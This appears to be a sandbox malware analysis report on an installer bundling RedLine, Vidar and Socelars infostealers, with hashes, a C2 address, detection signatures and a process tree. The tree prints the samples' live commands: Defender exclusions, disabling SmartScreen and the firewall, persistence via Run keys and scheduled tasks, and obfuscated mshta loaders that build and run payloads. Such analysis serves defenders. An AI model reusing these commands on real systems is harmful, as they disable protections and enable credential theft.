Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
763s -
max time network
1167s -
platform
windows11_x64 -
resource
win11 -
submitted
08-10-2021 05:38
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media214
C2
91.121.67.60:2151
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies security service 2 TTPs 1 IoCs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 23 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Arkei Stealer Payload 2 IoCs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 15 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
-
Suspicious use of SetThreadContext 15 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 25 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 45 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 3 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe"C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe"C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 3207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe" ) do taskkill /f /Im "%~nxQ"8⤵
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\SMD2fE1.N12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N13⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N15⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "y1G8FfzF7rmhnTW5xkTk4_xz.exe"9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"8⤵
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)9⤵
- Modifies security service
- Adds Run key to start application
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off10⤵
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6088 -s 22249⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe"C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe"C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe"C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe"C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe"C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe"C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe"C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe"C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe"C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe"C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe"C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe"C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Executes dropped EXE
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe"C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe"C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 17367⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe"C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 2687⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe"C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe"C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 3047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe"C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe"C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe"C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe"C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "oMnd8HW8cwFc0YultdzLDnwG.exe"11⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe"C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 2369⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe"C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe"8⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 17329⤵
- Executes dropped EXE
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe"C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe"8⤵
-
